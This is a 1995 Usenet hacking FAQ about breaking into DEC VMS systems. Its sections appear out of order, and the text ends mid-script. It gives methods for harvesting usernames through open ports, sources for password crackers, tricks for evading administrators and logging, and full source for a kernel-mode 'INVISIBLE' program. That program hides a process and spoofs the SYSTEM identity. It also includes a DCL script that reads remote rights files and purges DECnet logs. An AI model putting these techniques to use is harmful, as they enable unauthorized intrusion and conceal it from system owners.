		-       TCP/IP Networked Machines        - 

1.  "I have found a remote VMS machine on a TCP/IP network (I.E. 
     the Internet).   I have tried to finger the remote system in
     order to start collecting usernames,   I get a 'connection
     refused'.... Now what?"

	Connect to the SYSTAT port (Port 11).  This will give jobs
	currently running on the system.  More than likely,  this
	port has been left open.  With this in mind,  you can 
	sort though all the jobs and grab usernames,  while excluding
	system jobs (I.E - SWAPPER,  ERRFMT,  AUDIT_SERVER, 
	JOB_CONTROL,  NETACP,  EVL,  REMACP,  SYMBIONT*,  
	XYP_SERVER,   OPCOM,  INET_SERVERS, etc....etc).  

	Also,  I find one great trick is to look for "Student" type
	accounts.  That is,  accounts that appear to be repetitive. 
	You can then predict possible usernames. 

	The above can be accomplished by using the below command
	(In most cases):

$ TELNET SITE.ADDRESS.COM /PORT=11

	Try other ports as well.  Netstat is port 15.

2.      "On Unix machines,  I can make a symbolic link to a 'questionable'
	command,   so that is appears that I am doing one thing when 
	I am really doing another (Or copying and renaming the command). 
	Is there anyway I can make it appear that I am doing something 
	that I am not?". 

	When the command "finger" r "w" is issued,  a user/administrator
	can see what image is currently being executed by a particular
	user.   For example sake,  lets say you want to play with 
	NCP but you know that if the administrators see you in NCP, 
	they will get rather irate,  and kick you off the system. 
	You can make it appear that you are doing something else 
	by:

	a>  Copying the image,  renaming it,  and running it. [which
	    may or may not work]. 

*3.    TCPDUMP

	Multinet(and probably other TCP/IP implementations on VMS) provides
	the sniffer program TCPDUMP, but of course you must be privileged
	to use it.

-	Note;  On systems using older versions of VMS Multinet, 
	FTP is not logged to console (via OPCOM process).  It _is_
	logged,  but the operator is not informed.   With this in 
	mind,  you can use this to "test" accounts on remote systems.

Final Notes: 

	This FAQ is far from complete,  and will remain in its "beta"
	stages for sometime.  

	I would like to thank Tyswt for his input and great information.

	I got alot of mail from alot of people. 

	- Things that need to be added/updates:

	  Information on the OPCOM process....

	- What we are looking for:

	  Ways of intercepting VMS communications(through mailboxes, etc.)

	  Passing commands via VMS mail.

	  Disk scavenging programs(along the lines of an "UNDELETE")

	  Xterm,Motif security

	  Various methods of machine spoofing(via TCP/IP,LAT,etc.)

	  File hacks with 'dump', 'patch', VFE, etc.

	  Anything else we might have missed.

	beave@vistech.net 

	"It ain't done,  but hey... It a fucking start......"

The VMS Hack FAQ by The Beaver and Tsyvt Version 0.02 (August 18, 1995)

From: anon-remailer@utopia.hacktic.nl (Anonymous)
Newsgroups: alt.2600
Subject: VMS Hack FAQ (part 1)
Date: 18 Aug 1995 06:45:14 +0200

		- VMS HACK FAQ (Frequently Ask Questions) -

			  - Beta 0.02 Release -

			 originally by The Beaver
			    updated by Tsywt  

Introduction:

	This article contain the answers to some frequently asked question
	(Hence,  the name FAQ) about hacking the VMS operating system. 

	"Why a VMS Hacking FAQ?"

	Several reasons.    Once and a while,   A escape from Unix is
	very,  very nice.   Another reason is that is art of 
	VMS hacking has since vanished,  and its replacement are
	statements like,  "Hacking VMS is impossible", "VMS is
	to cryptic to use",  and as always,  "Man,  VMS sucks". 

	These are generally statements by people who know almost 
	zero about VMS.   I don't want to go into a "which OS is
	better",  because that would defeat the purpose of this 
	file,  but in my personal opinion,   both OS's have 
	there advantages/disadvantages. 

	I have,  however,  written this FAQ with a Unix overtone
	to it,  to help the reader understand what is trying to
	be accomplished in some examples. 

	The article may be freely redistributed in its entirety provide
	that credits are not altered or removed.   It may not be 
	sold for profit or incorporated in commercial documents without
	the written permission of the author(s). 

	This is the beta release of this article,   which means,  
	the article is still in the working,  and is not complete. 

	Submissions,  corrections,  comments,  input,  complaints, 
	bomb threats,   cash,  etc.,  should be directed toward
	the alt.2600 newsgroup. 

Index ---:

More Common Newbie Questions:

1.  VMS Basic information ("What does VMS run on?")
2.  Password storage information (SYSUAF.DAT) ("Where the hell is the 
    /etc/passwd file??!?!?!")
3.  User storage information (RIGHTSLIST.DAT)
4.  Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS
    machines?")
5.  Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
6.  SET DEFAULT command ("How the do I change damn directory's?")
7.  The infamous "CD" .COM file ("I hate this SET DEFAULT crap") 
8.  LOGIN.COM ("Okay,  where's my .profile???").
9.  Captive Accounts ("I can't get to DCL"). 
10. Terminal Spoofing ("How can I passively gather passwords at a terminal?")
11. User Impersonation ("Can I masquerade as another user?")
12. Accounting/Auditing ("Who's watching me?")

VMS Mail Hack Routines:

1.  Fake Mail ("How do I send fake mail to VMS machines?")
2.  Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
3.  Mail Bomb ("I need to mailbomb a user from my VMS account,  how?)

VMS Phone Hack Routines:

1.  Anonymous Phone Messages("How do I become a VAXPhone phreaker?")
2.  Phone Directories("How can I do a 'sh users' using the phone protocol?")

User/Image Privilege Information:

1.  Systems Privileges, Listing and explanation ("How are Priv's setup?")
2.  Creating privileged images ("Can I create a SUID Shell on a VMS box?")

DECNetwork Information.

1.  Brief Description of a DECNet ("What's a DECNet?")
2.  What it means to you ("What can it do for me?")
3.  Obtaining files/system info/etc ("How do I get information for the remote?")
4.  Using remote nodes ("How do I connect interactively?")
5.  Getting node lists ("How do I find connectable nodes?")
6.  Proxy Logins ("Can't DECNet nodes be protected?")
7.  Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?") 
8.  Sneak Routing ("Can I get to a machine I normally couldn't through another
    machine?")

TCP/IP Connected VMS Machines. 

1.  Obtaining remote usernames without "FINGER" ("How do I get usernames
    if FINGER is disabled")
2.  Changing the image running in FINGER ("How do I link a command name to
    another so it appears I am running a different image?")
3.  The TCPDUMP sniffer

		-      More Common Newbie Questions      -

1.      "What does VMS run on?"

	VMS (Virtual Memory System) runs on Digital Equipment Corp. 
	(DEC - pronounced,  "DECK") VAX (Virtual Address eXtension)
	and the newer Alpha's.   The user uses DCL (DEC Command
	Language) to interact with the computer.  These commands
	and there syntax are completely different then those of
	Unix and Unix-like operating systems,  thus a completely
	different mindset is often required (this is the authors
	opinion). 

2.      "Where in the hell is the passwd file???!?!?!"

	There is no /etc/passwd file.  All user information is kept in
	a file called SYSUAF.DAT,  which is stored in the directory
	(or actual the logical) SYS$SYSTEM.   This file is usually
	not readable by "normal" users.
	VMS standard accounts (SYSTEM, FIELD, etc) no longer have default
	passwords. 

3.      One file that is available to "normal" users is
	SYS$SYSTEM:RIGHTSLIST.DAT. This file has a list of users and
	their respective rights identifiers. Since the file isn't very
	readable, an extraction program is a nice tool to have. The
	following DCL procedure is just an example of such a program and
	probably shouldn't be used, especially on a large system, because
	of its inefficiency. It should lead you in the right direction
	though.

$! Program: Extract_Rights.Com
$! Author: Tsywt
$!
$ On Error Then $Goto Exit
$!
$ If F$mode() .Nes. "INTERACTIVE" then goto BATCH_END
$
$ Inquire system "Please enter system"
$ If system .eqs. ""
$  Then
$   Open/share in sys$system:rightslist.dat
$ Else
$   Open/share in 'system'::sys$system:rightslist.dat
$ Endif
$ Open/write out users.dat
$ Read/nolock in record
$Read_Loop1:
$ Read/nolock in record /end=Done_Users
$! If not at start of environmental identifiers
$ If f$extract(16,6,record) .nes. "BATCH "
$  Then
$   Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Else
$   Goto Done_Users
$ Endif
$ Goto Read_Loop1
$Done_Users:
$ Close out
$ Open/write out rights.dat
$ Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$Read_Loop7:
$ Read/nolock in record /end=Done_Rights
$! holder is null
$ If f$extract(8,1,record) .eqs. ""
$  Then
$   Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Endif
$ Goto Read_Loop7
$Done_Rights:
$ Close out
$!
$ Open/write out users_ids.dat
$ Open in2 users.dat
$Read_Loop2:
$ position = 0
$ Read/nolock in2 record1 /end=Done_Program
$Read_Loop3:
$! Go to first record in file because can't do key search on id
$ Open/share in3 rights.dat
$! Search holders for user id
$ Read/nolock/error=Done_No_Id in -
   record2/index=1/key="''f$extract(0,4,record1)'"/end=Done_No_Id
$Read_Loop4:
$! Kluge because nulls cause problems on key search
$ If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$  Then
$   Read/nolock in record2/end=Done_No_Id
$   Goto Read_Loop4
$ Endif
$! Move to next holder match
$ temp_pos = position
$Read_Loop5:
$ If temp_pos .gt. 0
$  Then
$   Read/nolock in record2/end=Read_Loop2
$   If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$    Then
$     Goto Read_Loop2
$   Endif
$   temp_pos = temp_pos - 1
$   Goto Read_Loop5
$ Endif
$Read_Loop6:
$! Look for identifier id
$ Read/nolock in3 record3/end=Done_No_Id
$ If f$extract(0,4,record3) .eqs. f$extract(0,4,record2)
$  Then
$   Write out f$extract(5,32,record1) + " " + f$extract(5,32,record3)
$   position = position + 1
$   Close in3
$   Goto Read_Loop3
$ Endif
$ Goto Read_Loop6
$Done_No_Id:
$ Write out f$extract(5,32,record1)
$ Close in3
$ Goto Read_Loop2
$Done_Program:
$Exit:
$ Close/error=Close_In2 in
$Close_In2:
$ Close/error=Close_Out in2
$Close_Out:
$ Close out
$ Delete users.dat.
$ Delete rights.dat.
$ If system .nes. ""
$  Then
$   Submit/after="+:15"/keep/params=('system') extract_rights.com
$ Endif
$ Exit
$Batch_End:
$Clean_Up:
$! Clean up DECnet logging
$ Dir 'p1'::netserver.log
$ Purge 'p1'::netserver.log
$ Exit

4.      "Is there a version of "Crack" that I can run on a VMS machine?"

	The Unix program, "Crack" will not work,  but there are password
	guessing routines available.

	The best on I have seen is "GUESS_PASSWORD.EXE",  which can be
	obtained from the following sites.

	ftp.wku.edu:/vms/fileserv/uaf.zip
	ftp.spc.edu:/macro32/savesets/uaf.zip

	In order for the routine to work,  you need access to the
	SYSUAF.DAT.  This version works on both OpenVMS VAX and 
	OpenVMS AXP.

	There is also a program available for the PC called VMSCrack 1.0.
	Once again, it requires that you have access to the SYSUAF.DAT
	so that you can copy it to the PC.

5.      "Can I 'Cloak' in routine in VMS?"

	Yes.  Below is the code needed to make your process invisible
	to "FINGER",  "SHOW USERS",  etc...
	Also, check out Bruce Ellis' "Hitchhiker's Guide to VMS"

	First,  create the following file:

Name: BUILD_INVISIBLE.COM
---------------------------------[Cut Here]-----------------------------------
$ save_verify = 'f$verify(0)'
$ system = "vax"        !Set to "alpha" for Alpha
$!
$!  File to build Ehud Gavron's INVISIBLE
$!
$!  Author:     Hunter Goatley
$!
$ say := write sys$output
$ on error then goto common_exit
$ on contrl_y then goto common_exit
$ say "Extracting $JIBDEF and $PCBDEF from LIB.MLB...."
$ library/macro/extr=$JIBDEF/out=jibdef.mar sys$library:lib.mlb
$ library/macro/extr=$PCBDEF/out=pcbdef.mar sys$library:lib.mlb
$ say "Converting $*DEF macros to C .H files...."
$ call convert_to_h jibdef.mar
$ call convert_to_h pcbdef.mar
$ say "Compiling INVISIBLE...."
$ cc invisible
$ say "Linking INVISIBLE...."
$ link/notrace invisible,invisible.opt_'system'/opt
$ say "INVISIBLE build completed"
$ common_exit:
$       exit f$verify(save_verify).or.1
$ convert_to_h: subroutine
$ name = f$parse(p1,"","","NAME")
$ open/read tmp 'p1'
$ create 'name'.H
$ open/append tmph 'name'.H
$ cvt_loop:
$    read/error=cvt_fin tmp line
$    if f$extract(0,4,line).nes."$EQU" then goto cvt_loop
$    write tmph "#define ",f$extract(4,255,line)
$    goto cvt_loop
$ cvt_fin:
$    close tmp
$    close tmph
$ write sys$output "C header file ''name'.H created"
$ exit
$ endsubroutine
-------------------------------[End Of File]-----------------------------------

	Next is the C Code for the "INVISIBLE" routine....

Name:  INVISIBLE.C
---------------------------------[Cut Here]------------------------------------
/*
 * Invisible    - Make a process invisible and visible again.  Originally
 *                written in MACRO32.  Now in C so it runs on Alpha too.
 *
 *
 *      Option file invisible.opt:
 *              ALPHA:  sys$loadable_images:sys$base_image.exe/share
 *
 *              VAX:    sys$system:sys.stb/selective_search
 *
 *
 *      Build:
 *              $ cc invisible
 *              $ link invisible,invisible/opt
 *
 *      Usage:
 *              $ run invisible
 *
 *
 *  Ehud Gavron
 *  ACES Consulting Inc.
 *  Gavron@ACES.COM
 *
 *      14-Oct-1992     Ehud Gavron     Ported to C, Alpha, ANSI, and 
 *                                      everything else.
 *
 */

#define module_name INVISIBLE
#define module_version "V1.0.0"

#ifdef __alpha
#pragma module module_name module_version
#else /* __vax */
#module module_name module_version
#endif /* __alpha */

#ifndef __alpha
#define sys$gl_ijobcnt sys$gw_ijobcnt
#endif

#include <descrip.h>
#include "jibdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include "pcbdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include <ssdef.h>
#include <jpidef.h>
#include <psldef.h>
#include <lnmdef.h>
typedef union {
	struct {
		short s_buflen;
		short s_itemcode;
		char *s_bufaddr;
		int *s_retlen;
		} s;
	unsigned long end;
	} ITEMLIST;

#define buflen          s.s_buflen
#define itemcode        s.s_itemcode
#define bufaddr         s.s_bufaddr
#define retlen          s.s_retlen

struct ISB {
	int     l_uic;
	int     l_namelen;
#ifdef __alpha
	int     l_jobtype;
#else
	char    b_jobtype;
#endif
	char    b_terminal;
	char    t_lname[PCB$S_LNAME + 1];
	char    t_username[JIB$S_USERNAME + 1];
	};

struct ISB isb;
static int lnm_retlen;

ITEMLIST lnm_itmlst[2];
ITEMLIST jpi_itmlst[2];
struct dsc$descriptor_s prcnam_desc;
struct dsc$descriptor_s prcnam;
$DESCRIPTOR(lnm_tabnam,"LNM$PROCESS_TABLE");
$DESCRIPTOR(lnm_lognam,"ISB");
$DESCRIPTOR(fao_prcnam,"SYMBIONT_!UL");
int sysuic = 0x00010004;
char sysusername[] = "SYSTEM        ";
char namebuf[PCB$S_LNAME];

#ifdef __alpha
main()
#else
cmain()
#endif
{
	int sys$cmkrnl(),sys$exit(),invisible_k();
	int ss_stat;

	lnm_itmlst[0].buflen = sizeof(isb);
	lnm_itmlst[0].itemcode = LNM$_STRING;
	lnm_itmlst[0].bufaddr = (char *)&isb;
	lnm_itmlst[0].retlen = &lnm_retlen;
	lnm_itmlst[1].end = 0;

	jpi_itmlst[0].buflen = PCB$S_LNAME;
	jpi_itmlst[0].itemcode = JPI$_PRCNAM;
	jpi_itmlst[0].bufaddr = (char *)&isb.t_lname;
	jpi_itmlst[0].retlen = (int *)&isb.l_namelen;
	jpi_itmlst[1].end = 0;

	prcnam_desc.dsc$a_pointer = (char *)&isb.t_lname;
	prcnam_desc.dsc$w_length = PCB$S_LNAME;
	prcnam_desc.dsc$b_dtype = DSC$K_DTYPE_T;
	prcnam_desc.dsc$b_class = DSC$K_CLASS_S;

	prcnam.dsc$a_pointer = (char *)&namebuf;
	prcnam.dsc$w_length = PCB$S_LNAME;
	prcnam.dsc$b_dtype = DSC$K_DTYPE_T;
	prcnam.dsc$b_class = DSC$K_CLASS_S;

	ss_stat = sys$cmkrnl(invisible_k,0);
	(void) sys$exit(ss_stat);       
}

int invisible_k()
{
	int sys$getjpiw(),sys$crelnm(),sys$fao(),sys$setprn();
	int strncpy(),sys$exit(),sys$trnlnm(),sys$dellnm();
	int *a_long;
	int acmode = PSL$C_KERNEL;

#pragma nostandard                      /* Oh well */
	globalref ctl$gl_pcb;
	globalref sys$gl_ijobcnt;
#pragma standard

	int ss_stat;
	char *pcb;
	char *jib;
	long *sts;
	long *own;
	char *p;
	long *q;
	int loop = 0;

	pcb = (char *)ctl$gl_pcb;

	if (pcb == 0) {
	   return(0);
	   }
	q = (long *)((char *)pcb + PCB$L_JIB);
	jib =(char *)  *q;

	sts = (long *)((char *)pcb + PCB$L_STS);

	if (*sts & PCB$M_INTER) {       /* Do stealth mode */
	   *sts = *sts^PCB$M_INTER;
	   *sts = *sts|PCB$M_NOACNT;

	   own = (long *)((char *)pcb + PCB$L_OWNER);
	   if (*own == 0) {  /* We are not a subprocess  */
	      sys$gl_ijobcnt--;
	      }

	   p = (char *)pcb + PCB$T_TERMINAL;
	   isb.b_terminal = *p;
	   *p = '\0'; 

#ifdef __alpha
	   q = (long *)((char *)jib + JIB$L_JOBTYPE);
	   isb.l_jobtype = *q;
	   *q = 0;
#else
	   p = (char *)jib + JIB$B_JOBTYPE;
	   isb.b_jobtype = *p;
	   *p = '\0';
#endif
	   strncpy((char *)&isb.t_username,
		   (char *)(jib + JIB$T_USERNAME),
		   JIB$S_USERNAME);

	   strncpy((char *)(jib + JIB$T_USERNAME),
		   (char *)&sysusername,
		   JIB$S_USERNAME);

	   q = (long *)((char *)pcb + PCB$L_UIC);
	   isb.l_uic = *q;
	   *q = sysuic;

	   ss_stat = sys$getjpiw(0,0,0,&jpi_itmlst,0,0,0);
	   if (!(ss_stat & 1)) return(ss_stat);
	   ss_stat = sys$crelnm(0,
				&lnm_tabnam,
				&lnm_lognam,
				&acmode,
				&lnm_itmlst);
	   if (!(ss_stat & 1)) return(ss_stat);
	   do {
	      loop++;
	      prcnam.dsc$w_length = PCB$S_LNAME;
	      ss_stat = sys$fao((char *)&fao_prcnam,
				(char *)&prcnam.dsc$w_length,
				(char *)&prcnam,
				loop);
	      if (!(ss_stat &1)) return(ss_stat);
	      ss_stat = sys$setprn((char*)&prcnam);
	      } while (ss_stat == SS$_DUPLNAM);      
	   return(SS$_NORMAL);
	   }
	else {  /* unstealth */
	   ss_stat = sys$trnlnm(0,
				&lnm_tabnam,
				&lnm_lognam,
				&acmode,
				&lnm_itmlst);
	   if (!(ss_stat & 1)) return(ss_stat);

	   ss_stat = sys$dellnm(&lnm_tabnam,
				&lnm_lognam,
				&acmode);
	   if (!(ss_stat & 1)) return(ss_stat);

	   *sts = *sts|PCB$M_INTER;
	   *sts = *sts^PCB$M_NOACNT;

	   own = (long *)((char *)pcb + PCB$L_OWNER);
	   if (*own == 0) {  /* We are not a subprocess  */
	      sys$gl_ijobcnt++;
	      }

	   q = (long *)((char *)pcb + PCB$L_UIC);
	   *q = isb.l_uic;

	   p = (char *)pcb + PCB$T_TERMINAL;
	   *p = isb.b_terminal;

#ifdef __alpha
	   q = (long *)((char *)jib + JIB$L_JOBTYPE);
	   *q = isb.l_jobtype;
#else
	   p = (char *)jib + JIB$B_JOBTYPE;
	   *p = isb.b_jobtype;
#endif
	   strncpy((char *)(jib + JIB$T_USERNAME),
		   (char *)&isb.t_username,
		   JIB$S_USERNAME);

	   prcnam_desc.dsc$w_length = (short)isb.l_namelen;
	   ss_stat = sys$setprn(&prcnam_desc);
	   return;
	}
}

#ifndef __alpha
int strncpy(a,b,c)
char *a,*b;
int c;
{
	for (; c > 0; c--) {
	  *a++ = *b++;
	  }
}
#endif
--------------------------------[End Of File]----------------------------------

	After these files are created,   type in the following at your
	DCL prompt:

$ @build_invisible      ! This will build our INVISIBLE.EXE routine.
$ run invisible         ! One the build is complete. 

	You should be completely "cloaked".

	To obtain full source, readme files,  etc,  you can obtain this
	program from:

	ftp.wku.edu:/vms/fileserv/invisible.zip
	ftp.spc.edu:/macro32/savesets/invisible.zip

6.      "How do I change damn directory's?". 

	This is done via the "SET DEFAULT" command.  In the following 
	format:

$ SET DEFAULT device:[directory]

	VMS uses a standard hierarchy system,  in which devices and 
	directory's are separated.  For example,  our home device/directory 
	might be:

	DISK3:[USR.JOEHACKER]

	DISK3:  would represent the device that we are on/using
	while,  [USR.JOEHACKER] would signify the actual directory
	on that device that we are using.  So,  to change directory's, 
	we could type:

$ SET DEFAULT [USR.BOB]

	If [USR.BOB] is a existing directory,  this would now be our
	current path (and we would still be located on the DISK3: 
	device.  If we wanted to simply back out one level (to the 
	[USR]) on that device,  we would issue the following command:

$ SET DEFAULT [-]

	The "[-]" signifies one directory back.  So if our path is,
	[USR.BOB.HACKING.VMS.PROGRAMS],  and we want to get to the 
	[USR.BOB] directory,  instead of typing the entire path 
	again,  we could simply type:

$ SET DEFAULT [---]

	"[---]" means,  back out three levels of the hierarchy. 

	There can be several devices on one VMS system (Device names
	can be obtained via a "SHOW DEVICES").  While your 
	home directory might be on DISK3,   another users could
	be on device DISK2.   To switch devices, we can add in
	the device name,  followed by the directory (if needed). 
	So,  if you need to get to a users who stores information
	in the DISK2:[REALLY.SECRET.STUFF] directory,  you could
	type the following DCL command:

$ SET DEFAULT DISK2:[REALLY.SECRET.STUFF]

	Or if we are currently in the "DISK3:[REALLY]" and we want
	to get to the information in the "DISK2:[REALLY]" directory,
	we could simply type 

$ SET DEFAULT DISK2:

	And the rest would be carried over. 

	In the event that you need to get to the top of the hierarchy
	(Unix equivelant:  "cd /"),  SET DEFAULT (to any disk structured
	device) to "[000000]".  For example,  to get to the very
	top of the hierarchy on device DISK2,  you would type. 

$ SET DEFAULT DISK2:[000000]

	VMS will also allow you to SET DEFAULT to a directory that does
	not exist.  When this happens,  the operating system will 
	inform you of this when you try to issue a command that requires
	some sort of file I/O.   If at any point you get completely 
	lost,  you can return to your "home" directory by typing

$ SET DEFAULT SYS$LOGIN:

7.      "I hate this SET DEFAULT crap.  Can I just use 'cd' command like
	 I do in Unix?". 

	By default,  no.  There are two things that you can do. 
	One,  add the following line to your "LOGIN.COM" (see
	where my .profile in VMS' for more information)

$ CD :== SET DEFAULT    ! I am hate typing that long "SET DEF" command

	Or you can us the following .COM file,  which will guarantee
	that you eat as many resources as you can......

	      [Taken from Phrack,  Vol. 2.  Issue 19.,  File 2]
			   [ Coded By The Mentor ]

			      Code for CD.COM
			       >>>>>>>>>>>>>>>

$! CD.COM v6.09
$! The Ultimate Change Directory Command.
$!
$  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
$  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
$  odir     = f$environment("DEFAULT")              ! Old  Directory
$  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
$!
$  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
$  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
$  if (ndir .eqs. "?")          then goto HELP      ! Instructions
$!
$  PARSE:
$  length   = f$length(ndir)                        ! Fix up ndir
$  if (f$location("@",ndir) .eq. 0) .or. -
      (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
$  right    = f$location("]",ndir) + 1
$  if (right .gt. length) then right = f$location(">", ndir)
$  if (right .le. length) then ndir  = f$extract(0, right, ndir)
$!
$  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
$     ndir   = f$trnlnm(ndir)                       ! Logical Name
$     goto PARSE
$!
$  CASESYM:
$  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
$     ndir = 'ndir'                                 ! Symbol
$     goto PARSE
$!
$  CASE0:
$  len_ndir = f$length(ndir)                        ! Regular Dir
$  if (f$location("[", ndir) .lt. len_ndir) .or. -
      (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
$!
$  CASE1:                                           ! Home Dir
$  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
$     ndir = hdir
$     goto SETDIR
$!
$  CASE2:                                           ! . .. .dir
$  if (f$location(".", ndir) .nes. 0) then goto CASE3
$     if (ndir .eqs. "..") then ndir = "-"
$     if (f$extract(0, 2, ndir) .eqs. "..") -
	 then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
$     ndir = "[" + ndir + "]"
$     if (ndir .eqs. "[.]") then ndir = odir
$     goto SETDIR
$!
$  CASE3:                                           ! :
$  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
$     left    = f$location(":", ndir) + 1
$     symbol  = f$extract(left, 1, ndir)
$     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
$     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
$        ndir = f$extract(0, left, ndir) + "[" -
	      + f$extract(left, len_ndir - left+1, ndir) + "]"
$     goto SETDIR
$!
$  CASE3B:                                          ! NODE::nothing
$  if (f$length(ndir)-1 .gt. left) then goto CASE3C
$     ndir = ndir + "[000000]"
$     goto SETDIR
$!
$  CASE3C:                                          ! NODE::directory
$  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
      then goto SETDIR
$
$     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
$     goto SETDIR
$!
$  CASE4:                                           ! dir
$  ndir = "[" + ndir + "]"
$!
$  SETDIR:
$  set default 'ndir'
$  if (f$parse("") .eqs. "") then goto DIRERROR
$!
$  DISPLAY:
$  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
$     hnode = f$getsyi("NODENAME")
$     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
$     if (cnode .eqs. "") then cnode = hnode
$     cdir  = f$environment("DEFAULT")
$     write sys$output " "
$     write sys$output "          Home Node: ", hnode
$     write sys$output "     Home Directory: ", hdir
$     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
$     write sys$output "       Current Node: ", cnode
$     write sys$output "  Current Directory: ", cdir
$  DISPSKIP:
$     write sys$output " "
$!
$  NODISPLAY:
$  ndir = f$environment("DEFAULT")
$  if .not. prompton then goto END
$!
$  if (f$length(ndir) .ge. 32) then goto TOOLONG
$!
$  SETPROMPT:
$  set prompt = 'ndir'" "
$!
$  END:
$  exit
$!
$  DIRERROR:
$  write sys$output " "
$  write sys$output "          ", ndir, " Directory does not exist!"
$  write sys$output " "
$  set default 'odir'
$  ndir = odir
$  goto NODISPLAY
$!
$! Prompt Problems------------------------------------------------------------
$!
$  TOOLONG:
$! Prompt is too long. Get rid of everything to the left of [ or <. If that
$! doesn't work, get rid of a subdirectory at a time.  As a last resort,
$! set the prompt back to $.
$!
$  left     = f$location("[", ndir)
$  len_ndir = f$length(ndir)
$  if (left .ge. len_ndir) then left = f$location("<",ndir)
$  if (left .gt. 0) .and. (left .lt. len_ndir) -
      then ndir = f$extract(left, len_ndir - left, ndir)
$!
$  STILLTOOLONG:
$    if (f$length(ndir) .lt. 32) then goto SETPROMPT
$    left     = f$location(".", ndir) + 1
$    len_ndir = f$length(ndir)
$    if left .ge. len_ndir then ndir = "$ "
$    if left .ne. len_ndir -
	then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
$    goto STILLTOOLONG
$!
$! Wildcard Directory---------------------------------------------------------
$!
$  DIRSEARCH:
$  error_message = f$environment("MESSAGE")
$  on control_y then goto DIREND
$  on control_c then goto DIREND
$  set message/nosev/nofac/noid/notext
$  write sys$output " "
$  dispct = 1
$  dirct  = 0
$  pauseflag = 1
$!
$  DIRLOOP:
$    userfile = f$search("*.dir")
$    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
$    if (userfile .eqs. "") then goto DIRNONE
$    dispct = dispct + 1
$    dirct  = dirct  + 1
$    on severe then $ userprot = "No Priv"
$    userprot = f$file_attributes(userfile,"PRO")
$    if userprot .nes. "No Priv" then userprot = " "
$    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
$    userprot'dirct' = userprot
$    lengthflag = (f$length(userfile'dirct') .gt. 18)
$    if lengthflag then write sys$output -
	f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (.not. lengthflag) then write sys$output -
	f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (dispct .lt. 8) then goto DIRLOOP
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    if pauseflag then goto DIRMENU
$    dispct = 0
$    goto DIRLOOP
$!
$  DIRMENU:
$  write sys$output " "
$  if (userfile .eqs. "") then goto DIRMENU2
$     write sys$output "    M   More subdirectories"
$  if pauseflag then -
$     write sys$output "    N   More subdirectories/No pause"
$!
$  DIRMENU2:
$     write sys$output "    R   Re-Display subdirectories"
$     write sys$output "    Q   Quit (default)"
$
$  DIRINQUIRE:
$  write sys$output " "
$  inquire dirchoice "  Select One"
$  write sys$output " "
$!
$  if (dirchoice .gt. 0)    .and. -
      (dirchoice .le. dirct) then goto DIRCASEDIGIT
$  dirchoice = f$edit(dirchoice,"UPCASE")
$  if (dirchoice .eqs. "")  .or. -
      (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
$  if (dirchoice .eqs. "M") .or. -
      (dirchoice .eqs. "N")  then goto DIRCASEMORE
$  if (dirchoice .eqs. "R")  then goto DIRCASERED
$!
$  DIRCASERROR:
$  if (dirct .eq. 1)   then write sys$output -
      "  Select 1 to change to the ", userfile1, " subdirectory. "
$  revdirct = dirct
$  if (dispct .eq. 8) then revdirct = revdirct - 2
$  if (dirct .gt. 1)   then write sys$output -
      "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
$  goto DIRINQUIRE
$!
$  DIRCASEDIGIT:
$  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
$  ndir = userfile'dirchoice'
$  goto DIREND
$!
$  DIRCASEBLANK:
$  write sys$output "  Subdirectory not changed."
$  write sys$output " "
$  goto DIREND
$!
$  DIRCASEMORE:
$  dispct = 0
$  if (dirchoice .eqs. "N") then pauseflag = 0
$  if (userfile .nes. "")   then goto DIRLOOP
$  write sys$output "  No more subdirectories to display."
$  goto DIRINQUIRE
$!
$  DIRCASERED:
$  dispct = 1
$  DISPLOOP:
$     if (userfile'dispct' .eqs "") then goto DISPDONT
$     lengthflag = (f$length(userfile'dispct') .gt. 18)
$     if lengthflag then write sys$output -
	 f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
$     if (.not. lengthflag) then write sys$output -
	 f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
$     DISPDONT:
$     dispct = dispct + 1
$     if (dispct .le. dirct) then goto DISPLOOP
$  goto DIRMENU
$!
$  DIRNONE:
$  write sys$output "No subdirectories to choose, or no directory privileges."
